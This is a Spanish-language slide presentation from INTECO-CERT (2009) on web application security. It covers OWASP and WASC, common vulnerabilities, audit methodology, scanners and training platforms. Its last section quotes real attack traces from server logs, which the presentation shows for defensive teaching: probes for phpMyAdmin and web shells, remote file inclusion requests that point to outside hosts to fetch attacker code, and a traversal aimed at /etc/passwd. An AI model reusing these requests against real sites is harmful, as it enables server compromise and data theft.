SEGURIDAD WEB:

AUDITORÍAS Y HERRAMIENTAS

Daniel Firvida Pereira

daniel.firvida@inteco.es
Marzo de 2009
Índice

Seguridad Web: Auditorías y Herramientas

0. Presentación INTECO

1. Auditorías Web
1) Introducción a la Seguridad Web
2) OWASP & WASC
3) Vulnerabilidades Web hoy en día
4) Procedimientos y técnicas de auditoria Web

2. Experiencias de INTECO-CERT
1) Experiencias de colaboración de INTECO-CERT

2
Índice

Seguridad Web: Auditorías y Herramientas

3. Herramientas de auditoría Web

1) Aplicaciones comerciales de auditoria para Web.
2) Aplicaciones gratuitas de auditoria para Web.
3) Plataformas de aprendizaje

4. Otras fuentes de Información

1) El otro lado: trazas de un ataque Web
2) Concursos y Retos

3
El Instituto Nacional de Tecnologías de la
Comunicación, INTECO

4
Actuaciones en e-Confianza de INTECO

1. ¿Qué es INTECO?
Instituto Nacional de Tecnologías de la Comunicación

Sociedad estatal adscrita al MITYC a través de SETSI

Instrumento del Plan Avanza para el desarrollo de la S.I
Pilares: Investigación aplicada, prestación de servicios y formación

OBJETIVOS

Convergencia de España con Europa

Crear en León un "Cluster-TIC" con alta capacidad de innovación.
Transversalidad tecnológica entre sectores y áreas de conocimiento TIC
Alta localización de conocimiento intensivo y conexión con otros centros
internacionales.

5
Actuaciones en e-Confianza de INTECO

2. Líneas estratégicas de actuación

e-Confianza
Calidad SW Accesibilidad
(Seguridad)

Centro de Centro de
Respuesta a Referencia en
Incidentes en Laboratorio Accesibilidad y
Tecnologías de la Nacional de Calidad Estándares Web
Información para
PYMEs y Ciudadanos Formación Centro Nacional de
Tecnologías de la
Centro Promoción de Accesibilidad
Demostrador de proyectos TIC
Tecnologías de la Área de I+D+i en
Promoción de Accesibilidad Web.
Seguridad
estándares y
Observatorio de normalización Centro de Gestión
Seguridad de la de servicios públicos
Información interactivos - TDT

Ciudadanía e Internet

Innovación TIC y Competitividad PYME

6
Actuaciones en e-Confianza de INTECO

3. Proyectos en e-Confianza

Sentar las bases de coordinación de iniciativas públicas entorno a la Seguridad

Informática
Coordinar la investigación aplicada y la formación especializada en el ámbito de la
seguridad TIC
Centro de referencia en Seguridad Informática a nivel nacional

Centro Demostrador de
INTECO CERT Tecnologías de la
Seguridad

Observatorio de la Seguridad de la información

7
INTECO-CERT

Objetivos

Impulsar la confianza en las nuevas tecnologías promoviendo su uso

de forma segura y responsable
Minimizar los perjuicios ocasionados por incidentes de seguridad,
accidentes o fallos facilitando mecanismos de prevención y reacción
adecuados
Prevenir, informar, concienciar y formar a la pyme y el ciudadano
proporcionando información clara y concisa acerca de la tecnología y
el estado de la seguridad en Internet.

8
INTECO-CERT

Servicios de INTECO-CERT en materia de seguridad:

http://cert.inteco.es

Servicios de Información:
• Suscripción a boletines y alertas
• Actualidad, noticias y eventos
• Avisos online sobre nuevos virus, vulnerabilidades, virus más extendidos
por correo electrónico, información sobre correo electrónico no deseado.
Servicios de Formación: guías, manuales, cursos online
Servicios de Protección: útiles gratuitos y actualizaciones de software
Servicios de Respuesta y Soporte:
• Gestión y resolución de Incidencias
• Gestión de Malware o código malicioso
• Fraude electrónico
• Asesoría Legal
• Foros

9
INTECO-CERT

Servicios de Información: Vulnerabilidades y Malware

Colaboración con NIST-NVD

Traducción de más de
33.800 vulnerabilidades
Clasificación por nivel de
severidad
Aportación de
vulnerabilidades
descubiertas.

10
INTECO-CERT

Servicios de Información: Virus en el correo

electrónico. Red de sensores de Virus.
Más de 170 sensores más de 100
millones de correos procesados al día.
0,40% de detección de correos
infectados de virus informáticos en más
de 40.000 millones de correos analizados.
Información de detecciones de malware
en correo en https://ersi.inteco.es/

11
INTECO-CERT
Servicios de Información: SPAM. Red de
sensores de SPAM.
https://ersi.inteco.es/

CORREOS ELECTRÓNICOS
12
INTECO-CERT

Servicios de Formación y Protección.

Formación

Guías y Manuales.
Buenas prácticas.
Preguntas frecuentes.

Protección

Descarga de útiles gratuitos de seguridad

Información sobre actualizaciones de software, parches etc..
Zonas de seguridad por plataformas: Linux, Microsoft, MacOS, Dispositivos
Móviles.

13
INTECO-CERT

Servicios de Formación y Protección.

Protección
Avisos y alertas de seguridad, a través de boletines y web.

14
INTECO-CERT
Servicios de Respuesta y Soporte.
Gestión de incidencias o problemas de seguridad

Resolución y ayuda ante incidentes de seguridad.

Análisis y recomendaciones de seguridad.
Sistemas de detección de malware en la red.

Desarrollo de herramientas propias: CONAN. Configuration

Analisys.

Recoge información del PC susceptible de ser

modificada por código malicioso y cualquier otra
información que nos sirva para determinar si el PC está
o no correctamente configurado.

15
INTECO-CERT

Servicios de Respuesta y Soporte.

Asesoría Legal

Buzón de Consultas, Foros de Usuarios y Asesoría Legal

de Derecho en las Nuevas Tecnologías

Difusión de Guías de buenas prácticas y Manuales de

concienciación y formación sobre legislación y normativas
en materia de Seguridad TIC.

Guías de implantación de medidas que faciliten el

cumplimiento de las disposiciones legales.

legal@cert.inteco.es

16
INTECO-CERT

Servicios de Respuesta y Soporte.

Lucha contra el Fraude
Información a los usuarios sobre todos los tipos de fraude electrónico a través
de foros y buzón fraude@cert.inteco.es.

Repositorio de fraude de INTECO con información estructurada de los fraudes

detectados
creación de inteligencia sobre fraude electrónico en España.

Colaboración con entidades financieras, FCSE, ISPs y registradores de

dominios.

17
Centro Demostrador de Tecnologías de la Seguridad

Objetivos
Fomentar y difundir el uso de tecnologías de seguridad de la información

Catálogo de Soluciones y Proveedores

Análisis de productos de seguridad
Formación a la PYME
Difusión e impulso de la tecnología de seguridad
Impulso del DNI electrónico y SGSI

http://demostrador.inteco.es

18
Centro Demostrador de Tecnologías de la Seguridad

Catálogo de empresas y soluciones

Catalogación de todos los actores

del mercado, datos de proveedor.

Catalogación de los productos que

ofrecen, datos de producto.

Catalogación de los servicios que

ofrecen, datos de servicio.

Catálogo impreso
19
Centro Demostrador de Tecnologías de la Seguridad

Catálogo online
20
Centro Demostrador de Tecnologías de la Seguridad

Taxonomía de productos y servicios

Productos (31 categorías) Servicios (14 categorías)

21
Centro Demostrador de Tecnologías de la Seguridad
DATOS ACTUALES DEL
OFERTA ACTUAL DE PRODUCTOS
CATÁLOGO
Nº DE Nº DE Autenticación
EMPRESAS SOLUCIONES 104

557 1007 Anti - Malware 64

Sistemas de seguridad de datos 45

Filtro y control de contenidos 38

OFERTA ACTUAL DE SERVICIOS

Políticas de Seguridad 128

Planificación e implantación de
infraestructuras 107
Cumplimiento con la legislación
(LOPD,..) 102

Certificación y Acreditación 61
22
Centro Demostrador de Tecnologías de la Seguridad

Análisis y demostración de productos y soluciones de

seguridad

Ámbito y alcance de la aplicación

Conocer sus capacidades y características

Análisis funcional y estructural

Ayuda a los fabricantes

Laboratorio de nuevos productos y tecnologías

Generar recomendaciones

23
Centro Demostrador de Tecnologías de la Seguridad

Difusión e impulso de la tecnología de seguridad

Estudio de mercado sobre las soluciones de seguridad TIC

Identificar nichos en la industria TIC española
Promoción de alianzas
Potenciar la tecnología de seguridad española y promover su desarrollo
Acuerdos con entidades de otros países

24
Centro Demostrador de Tecnologías de la Seguridad

Promoción de alianzas

• Empresas: convenios de colaboración

2008 2009

50 convenios 8 convenios

• Asociaciones: relación con todas las patronales del

sector.

• Actores proactivos: banca, universidades,…

25
Centro Demostrador de Tecnologías de la Seguridad
• Eventos propios
• I ENISE

II ENISE

26
Centro Demostrador de Tecnologías de la Seguridad

Formación a la Pyme

Identificación de amenazas

Elaboración de contenidos

Impulso cultura de seguridad

Impulso del uso de tecnologías de seguridad

Jornadas celebradas 25

Pymes sensibilizadas 2200

Media de asistentes 90

27
Programa de Impulso de los SGSI (Sistema de
Gestión de Seguridad de la Información)

Líneas Generales

CATÁLOGO
ORGANISMOS
CERTIFICACIÓN SGSI
Seleccionan

Colabora
CÁMARAS DE
COMERCIO
JORNADAS Y
Organizan TALLERES PYME
Colabora SGSI
con

INTECO Colabora

INTECO recibe la Seleccionan

encomienda de CATÁLOGO EMPRESAS
Gestión IMPLANTACIÓN SGSI

28
Impulso DNIe: Perfiles de Protección
Los Perfiles de Protección son
documentos que especifican una
solución de seguridad: la creación y
verificación de firma electrónica con
DNIe:
adoptan la legislación y normativa
nacional y europea
definen el nivel de garantía de
seguridad que ofrece una aplicación
certificada que cumpla con el perfil
Unas Guías que facilitarán a los
Los niveles de garantía de seguridad
EAL1 y EAL3 indican la profundidad y
rigor exigido en la evaluación de las
aplicaciones que se quieran certificar.
Van a servir para desarrollar y
certificar aplicaciones de
firma con DNIe con garantías
de seguridad:
Tipo 1: para plataformas TDT,
PDA’s o teléfonos móviles
Tipo 2: para ordenadores
personales con S.O. de propósito
general
desarrolladores el
cumplimiento con los
perfiles se podrán descargar
del Portal del DNIe de
INTECO
29
Resumen de Servicios de eConfianza.

Servicios prestados a pymes y ciudadanos:

Servicios gratuitos de Información a través del portal web, RSS o suscripción

• Actualidad, noticias y eventos
• Alertas y estadísticas en tiempo real sobre la seguridad en España
Servicios gratuitos de Formación en Seguridad de la Información
• Manuales sobre legislación vigente
• Configuración de seguridad en sistemas
• Guías de resolución de problemas de seguridad
• Buenas prácticas para la prevención de problemas de seguridad
Servicios gratuitos de Protección:
• Catálogo de útiles gratuitos de seguridad
• Catálogo de actualizaciones de software
Servicios gratuitos de Respuesta y Soporte:
• Gestión y resolución de Incidencias de Seguridad
• Gestión y soporte ante fraude electrónico
• Asesoría Legal

30
Contactos

INTECO-CERT

• contacto@cert.inteco.es
• incidencias@cert.inteco.es
• fraude@cert.inteco.es
• legal@cert.inteco.es Centro Demostrador de Tecnologías
• http://cert.inteco.es de la Seguridad

• info.demostrador@inteco.es
• catalogo.demostrador@inteco.es
• jornadas.pyme@inteco.es
• http://demostrador.inteco.es

31
Dónde estamos

www.inteco.es

Sede
Sede de
de INTECO
INTECO

Avda.
Avda. Jose
Jose Aguado
Aguado 41
41
Edificio
Edificio INTECO
INTECO
24005
24005 LEÓN
LEÓN

Tel:
Tel: (+34)
(+34) 987
987 877
877 189
189
Fax:
Fax: (+34)
(+34) 987
987 261
261 016
016

32
¿Preguntas?

33
Seguridad Web

34
1. Auditorías Web

Introducción a la seguridad Web

Problemática de seguridad en las aplicaciones Web

• Cada vez son aplicativos mas complejos y dinámicos.

• Resultan “fáciles” comprometer o atacar.
• Muchas veces están accesibles desde Internet y forman parte del
perímetro de seguridad de la empresa.
• Se trata de aplicaciones sin visión de la seguridad en su desarrollo.
• La seguridad en Internet no depende exclusivamente de la seguridad de la
red o de los sistemas, sino también de las aplicaciones que están
accesibles
La seguridad de las aplicaciones Web resulta muy importante y para
ello debemos auditarlas y asegurarnos de que no suponen un riesgo
para la organización.

35
1. Auditorías Web

OWASP: Open Web Application Security Project

¿Qué es OWASP?
• Fundación sin animo de lucro.
• Creada en 2001.
• Independiente de los fabricantes.
• Formada por voluntarios.

Objetivos:
• Promover la seguridad de las aplicaciones web.
• Buscar las causas de la inseguridad.
• Proporcionar soluciones a las amenazas.
• Crear herramientas, documentación y estándares.

36
1. Auditorías Web

OWASP: Open Web Application Security Project

¿Qué hace OWASP?

• Recursos para equipos de desarrollo.
• Foros de discusión.
• Aplicaciones para auditoria y para formación.
• Documentación y artículos.

Proyectos dentro de OWASP:

• Webscarab: Herramienta para auditoria.
• WebGoat: Herramienta para formación.
• OWASP Testing: Metodología.
• Web Application Penetration Checklist: Documentación.
• OWASP Guide y Top Ten Project: Documentación.

37
1. Auditorías Web

WASC: Web Application Security Consortium

¿Qué es WASC?
• Participada por la industria, expertos y organizaciones.
• Foro abierto de participación.
Objetivos:
• Promover estándares de seguridad web.
• Elaboración de artículos y guías de seguridad web.
• Compartir el conocimiento sobre las amenazas web.
Proyectos:
• Application Security Scanner Evaluation Criteria.
• Web Hacking Incidents Database.
• Distributed Open Proxy Honeypots.
• Web Security Threat Classification.

38
1. Auditorías Web

• Vulnerabilidades Web

El vector de ataque de las Vulnerabilidades Web son las Peticiones

El protocolo HTTP define diversos tipos de peticiones conocidos como
métodos, los comunes son los siguientes:
• OPTIONS: Permite listar todos los métodos permitidos por el servidor.
• GET: Sirve para solicitar un objeto Web, admite parámetros
• HEAD: Solicita la cabecera HTTP del servidor Web.
• POST: Sirve para solicitar un objeto Web, admite parámetros.
• PUT: Permite enviar un fichero al servidor Web.
• DELETE: Borra un objeto Web.
• TRACE: Tiene como finalidad propósitos de depuración.
• CONNECT: Permite conectar a otro servidor host (proxy, webserver, ...).

39
1. Auditorías Web

• Vulnerabilidades Web

Problemática: Autenticación en aplicaciones Web

• Autenticación anónima (sin autenticación)

• Autenticación a través de la propia aplicación Web
• Basada en formularios mediante peticiones de tipo GET / POST
• Autenticación basada en el protocolo HTTP
• HTTP Tipo Basic
• HTTP Tipo Digest
• Autenticación a través de credenciales del sistema operativo
• Cuentas de usuario locales o del dominio (AD, ldap, ...)
• Seguridad en función del sistema de ficheros (NTFS, ...)

40
1. Auditorías Web

• Vulnerabilidades Web

Ataques a los mecanismos de autenticación en las aplicaciones Web:

• Captura de credenciales (sniffing o hijacking)
• Si las credenciales de autenticación no viajan por un canal cifrado
(SSL) es posible capturar las credenciales de autenticación
utilizadas.
• Identificación de cuentas de usuario validas
• Respuestas diferentes cuando el usuario introducido es incorrecto de
cuando es la contraseña introducida es incorrecta
• Denegación de servicio a los mecanismos de autenticación
• A realizar n intentos de autenticación fallidos y la aplicación no esta
correctamente parametrizada es posible bloquear las cuentas de
usuario
• Ataque por Fuerza Bruta o Diccionario
• Si se combina la identificación de usuario con una incorrecta política
de bloqueo de cuentas puede realizarse estos ataques

41
1. Auditorías Web

• Vulnerabilidades Web

Problemática: Gestión de las Sesiones en las aplicaciones Web

• El protocolo HTTP es un protocolo sin estado, se necesitan identificadores

de sesión.
• La gestión de sesiones es un proceso ligado con el proceso de
autenticación de usuario.
• Se asocia al usuario un identificador de Sesión que este enviara a la
aplicación Web en cada petición
• El identificador de sesión es generalmente una cadena de caracteres
generada “aleatoriamente”
• El identificador de sesión forma parte de la cabecera HTTP, como Cookie.
Aunque es posible enviarlo en peticiones de tipo GET o POST

42
1. Auditorías Web

• Vulnerabilidades Web

Ataques a los mecanismos de gestión de identificadores de Sesión

• Ataques de interceptación de sesión
• Existen diferentes ataques de intercepción por ejemplo: sniffing,
XSS, SQL injection, etc.
• Ataques por predicción del identificador
• Si la cadena de caracteres del identificador no es suficientemente
aleatoria puede permitir su predicción
• Ataques por Fuerza Bruta
• Si el algoritmo utilizado para la generación del identificador no es
suficientemente robusto, puede ser posible obtener una sesión
valida por fuerza bruta
• Ataques de Fijación de sesión
• Si la aplicación no gestiona la caducidad de las sesiones o asocia
siempre la misma sesión a un mismo usuario puede permitir el robo
de sesiones por diversos métodos (virus, hijacking, etc)

43
1. Auditorías Web

• Vulnerabilidades Web

Problemática: Validación de caracteres de entrada y salida

• Incorrecto control de los caracteres en variables de entrada.
• SQL injection
• Command Injection
• Inclusión de código script de servidor.
• Idap injection
• Include path
• Transversal Directory
• Incorrecto control de los tamaños de las variable de entrada
• Desbordamientos de Buffer
• Denegaciones de Servicio

Ataques de validación de I/O:

• El limite es la imaginación

44
1. Auditorías Web

• Vulnerabilidades Web hoy en dia:

El Top 10 de vulnerabilidades de OWASP

Cross Site Scripting (XSS).

Inyecciones de código.

Ejecución de ficheros maliciosos.

Manipulación de rutas a objetos.

Cross Site Request Forgery (CSRF).

Manejo inadecuado de errores.

45
1. Auditorías Web

• Vulnerabilidades Web hoy en dia:

El Top 10 de vulnerabilidades de OWASP

Robo de credenciales de sesión o de control de acceso.

Almacenamiento de datos inseguro.

Comunicaciones por un canal inseguro.

Fallo en la ocultación de URLs de gestión.

http://www.owasp.org/index.php/Top_10_2007

http://www.owasp.org/index.php/Top_10_2004

46
1. Auditorías Web

Utilización de la herramienta adecuada a cada aplicativo.

Metodología de auditoria.
OWASP Testing.
Web Application Penetration Checklist.
OSSTMM.

Chequear todos los resultados de las herramientas.

Uso de herramientas para localización de URLs ocultas.

Conocer en lo posible la aplicación.

47
1. Auditorías Web

Documentarse sobre las vulnerabilidades existentes.

Uso de distintos patrones de los ataques

XSS (Cross Site Scripting) Cheat Sheet -
http://ha.ckers.org/xss.html
XSSDB attack database - http://www.gnucitizen.org/xssdb/

Captura de evidencias.

No realizar denegaciones de Servicio.

Uso de herramientas de aprendizaje como WebGoat o

participación en concursos de hacking
48
1. Auditorías Web

Es importante no menospreciar las fugas de información en las

respuestas del servidor
Es necesario validar todos los caracteres de entrada en las
variables de peticiones GET y POST
Hay que generar identificadores de sesión complejos, con
aleatoriedad, enviarlos a través de las Cookies y con caducidad
Utilización de contraseñas fuertes.
Validar el identificador de sesión en todas las páginas.
No almacenar las contraseñas en claro en la Base de Datos.
No utilizar variables ocultas que no deseen ser vistas o
modificadas por el usuario.

49
2. Experiencias de INTECO-CERT

Gestión de incidencias o problemas de seguridad

Resolución y ayuda ante incidentes de seguridad.

Análisis y recomendaciones de seguridad.
Sistemas de detección de malware en la red.

Ministerio de Vivienda: A partir de un incidente Foro Internacional de Contenidos Digitales:

de seguridad en la pagina web se realizo un Revisión de seguridad de la Web del Foro
análisis exhaustivo de la seguridad de la misma. Internacional de Contenidos Digitales (FICOD
2008) del Ministerio de Industria.

50
2. Experiencias de INTECO-CERT

Vulnerabilidades más encontradas

Vulnerabilidades de SQL injection.

• Con obtención de usuarios y contraseñas.
Incorrecto manejo de sesiones.
• Posibilidad de saltarse la autenticación y obtener una sesión
privilegiada en la aplicación.
Incorrecta configuración del servidor.
• Listado de directorios.
• Obtención de información sensible del servidor.
• Acceso a ficheros de logs.
Versiones no actualizadas o con vulnerabilidades.
• Versiones de PHP, del gestor de contenidos, etc.

51
3. Herramientas de auditoría Web

• Aplicaciones comerciales
Características comunes

Propósito múltiple (no exclusivas por vulnerabilidad).

Capacidad de auditoria ante cualquier tipo de aplicativo.

Incorporan utilidades para pruebas manuales.

Aspectos Configurables.

Proporcionan abundante documentación.

Suelen ser herramientas lentas.

Tienen muchos falsos positivos.

Un elevado precio.

52
3. Herramientas de auditoría Web

• Acunetix Web Vulnerability Scanner

53
3. Herramientas de auditoría Web

• IBM Rational AppScan

54
3. Herramientas de auditoría Web

• HP WebInspect

55
3. Herramientas de auditoría Web

• Aplicaciones gratuitas
Características comunes

La mayoría son para un propósito especifico.

Tienen limitaciones para algún tipo de aplicativo.

Incorporan utilidades para pruebas manuales.

Mayor capacidad de configuración.

Proporcionan menos documentación.

Suelen ser herramientas lentas.

Tienen muchos falsos positivos.

Son gratis ☺.

56
3. Herramientas de auditoría Web

• WebScarab

57
3. Herramientas de auditoría Web

• Paros

58
3. Herramientas de auditoría Web

• w3af

59
3. Herramientas de auditoría Web

• Plataformas de aprendizaje: WEBGOAT

60
3. Herramientas de auditoría Web

• Plataformas de aprendizaje: WEBGOAT

Video Soluciones

http://yehg.net/lab/pr0js/training/webgoat.php

61
3. Herramientas de auditoría Web

• Plataformas de aprendizaje: HACKME FOUNDSTONE

http://www.foundstone.com/us/resources-free-tools.asp
62
4. Otras fuentes de Información

Búsqueda de un objetivo para un ataque

GET /horde-3.0.6//README HTTP/1.1
GET /horde-3.0.7//README HTTP/1.1
GET /horde-3.0.8//README HTTP/1.1
GET /email//README HTTP/1.1
GET /webmail//README HTTP/1.1
GET /mailz//README HTTP/1.1
GET /horde2//README HTTP/1.1

GET //scgi/awstats/awstats.pl HTTP/1.1

GET //scripts/awstats.pl HTTP/1.1
GET //cgi-bin/awstats/awstats.pl HTTP/1.1
GET //cgi-bin/stats/awstats.pl HTTP/1.1
GET //scgi-bin/stats/awstats.pl HTTP/1.1

CONNECT 195.175.37.70:8080 HTTP/1.0

OPTIONS * HTTP/1.0

63
4. Otras fuentes de Información

Búsqueda de un objetivo para un ataque

GET /phpMyAdmin/main.php HTTP/1.0

GET /phpmyadmin/main.php HTTP/1.0
GET /phpmyadmin/tbl_select.php HTTP/1.1
GET /phpmyadmin0/tbl_select.php HTTP/1.1
GET /mysql/phpmyadmin/tbl_select.php HTTP/1.1
GET /xampp/phpmyadmin/tbl_select.php HTTP/1.1
GET /phpmyadmin2/read_dump.php HTTP/1.0
GET /phpMyAdmin-2.2.3/read_dump.php HTTP/1.0

GET /phpmyadmin/r57.php HTTP/1.1

GET /phpmyadmin/c99.php HTTP/1.1
GET /phpmyadmin/shell.php HTTP/1.1
GET /phpmyadmin/cmd.php HTTP/1.1

GET /w00tw00t.at.ISC.SANS.MSlog:) HTTP/1.1

GET /w00tw00t.at.ISC.SANS.Pwn!t:) HTTP/1.1
GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1

64
4. Otras fuentes de Información

Trazas de un intento de ataque

/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.thera
nchjohnstown.com/menu/r7?? HTTP/1.1

/en/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://sh311.a
ltervista.org/a.txt?? HTTP/1.1

/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://sh311.alter
vista.org/a.txt?? HTTP/1.1

/textos/en//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=ftp://ft
p.metaltrade.ru/incoming/%FF%FF%FF%FF%FF%FFo%FF%FF%FF%FF%FF%FF
/1? HTTP/1.1

//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=ftp://80.50.253.9
0/upload/071011004039p/old? HTTP/1.1

/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6254&STRMVER=4&CAPREQ=0
HTTP/1.1

65
4. Otras fuentes de Información

Trazas de un intento de ataque

GET
/includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://80.3
4.102.151/joomla/1.gif?/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-us
Connection: Close
Host: 85.17.35.X
User-Agent: Morfeus Fucking Scanner
mod_security-action: 406

HTTP/1.1 406 Not Acceptable

Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

66
4. Otras fuentes de Información

Trazas de un intento de ataque

GET
/textos/en//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=ftp:/
/ftp.metaltrade.ru/incoming/%FF%FF%FF%FF%FF%FFo%FF%FF%FF%FF%FF%F
F/1? HTTP/1.1
Connection: TE, close
Host: www.X.com
TE: deflate,gzip;q=0.3
User-Agent: libwww-perl/5.808
mod_security-action: 406

HTTP/1.1 406 Not Acceptable

Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

67
4. Otras fuentes de Información

Trazas de un intento de ataque

GET /cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd HTTP/1.0

Connection: Keep-Alive
Content-Length: 0
Host: www.X.net
User-Agent: Mozilla/4.75 (Nikto/1.35 )
mod_security-action: 406

HTTP/1.1 406 Not Acceptable

Connection: close
Content-Type: text/html; charset=iso-8859-1

68
4. Otras fuentes de Información

CONCURSOS Y RETOS

Retos Hacking (I – IX)

http://elladodelmal.blogspot.com/search/label/Reto%20Hacking

Concurso BSGAME #1

http://blindsec.com:81/
http://www.yoire.com/1190-primer-torneo-de-seguridad-blindsec-bsgame-1

SecGame SG6Labs

http://www.sg6.es/labs/

69
¿Preguntas?

70
Muchas gracias

71
www.inteco.es